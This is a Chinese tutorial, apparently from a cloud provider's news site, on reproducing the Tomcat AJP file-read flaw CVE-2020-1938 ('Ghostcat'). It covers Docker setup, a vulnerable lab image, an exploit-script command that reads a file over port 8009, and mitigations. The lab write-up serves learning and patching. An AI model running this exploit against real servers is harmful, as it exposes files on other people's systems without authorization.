您好,登錄后才能下訂單哦!
小編給大家分享一下Tomcat中Ajp文件讀取漏洞復現的示例分析,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!
由于Tomcat默認開啟的AJP服務(8009端口)存在一處文件包含缺陷,攻擊者可構造惡意的請求包進行文件包含操作,進而讀取受影響Tomcat服務器上的Web目錄文件。
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-1938
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
1. 先裝docker 環境
1.1 apt-get update
1.2 apt-get install -y apt-transport-https ca-certificates
1.3 apt-get install dirmngr
1.4 curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -
1.5 echo 'deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable' | sudo tee /etc/apt/sources.list.d/docker.list
1.6 apt-get update
1.7 apt install docker-ce
1.8 service docker status~
1.9 service docker status
2.0 service docker start
2.1 service docker version
2.2 docker version
2.3 docker run hello-world
環境搭建:
下載鏡像 docker pull negoowen/ghostcat:1.0
啟動鏡像
docker run -d -p 8080:8080 -p 8009:8009 --name ghostcat negoowen/ghostcat:1.0
讀取文件
鏡像里已經寫入一個test.txt文件,以此文件做測試
python CVE-2020-1938.py -p 8009 -f test.txt 192.168.195.133
1.官方升級
Apache Tomcat 7.0.100
Apache Tomcat 8.5.51
Apache Tomcat 9.0.31
2. 關閉AJP默認開啟端口(這里是8009)或只監聽本地
以上是“Tomcat中Ajp文件讀取漏洞復現的示例分析”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業資訊頻道!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。